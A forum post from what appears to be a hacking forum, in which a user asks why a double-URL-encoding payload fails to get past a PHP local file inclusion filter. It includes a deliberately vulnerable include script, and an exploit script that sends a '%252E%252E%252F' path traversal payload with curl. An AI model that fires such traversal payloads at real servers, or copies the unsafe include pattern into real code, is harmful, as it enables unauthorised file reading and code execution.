Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


Bypass LFI filter with double Encoding

  • 0 Vote(s) - 0 Average


07-19-2017, 07:10 AM #1
MadSec Offline BlackHat **
Registered
Posts:7 Threads:5 Joined:Mar 2017 Reputation: 0
Mood: Mad
Clapping I'm trying to bypass a lfi filter using double encoding:
https://www.owasp.org/index.php/Double_Encoding

I made three files to see whether it would work, but it doesn't, it will remove everything except the file name.

../include.php: the file I want to include

PHP Code:
Code:
<?php
echo"hi";
?>

test.php: lfi filter that I try to bypass

PHP Code:
Code:
<?php
error_reporting(E_ALL);
ini_set('display_errors', 'On');
$_GET['sFile'] = str_replace("../","",strtolower($_GET['sFile']));
$_GET['sFile'] = str_replace("./","",$_GET['sFile']);
$_GET['sFile'] = str_replace("%2e%2e%2f","",$_GET['sFile']);
$_GET['sFile'] = str_replace("%2e%2f","",$_GET['sFile']);
include($_GET['sFile']);
?>

exploit.php: the script that sends the payload

PHP Code:
Code:
<?php
$ch = curl_init();
/* double encoding of "../" => "%252E%252E%252F" */
curl_setopt($ch, CURLOPT_URL, "http://url/lfitest/tst/test.php?sFile=%252E%252E%252Finclude.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$sOutput = curl_exec($ch);
curl_close($ch);
echo $sOutput;
?>

Any help would be greatly appreciated.
Thanks in advance!  Thumbsupsmileyanim Thumbsupsmileyanim

[Image: qXShBci.png]






Forum Jump:


Users browsing this thread:1 Guest(s)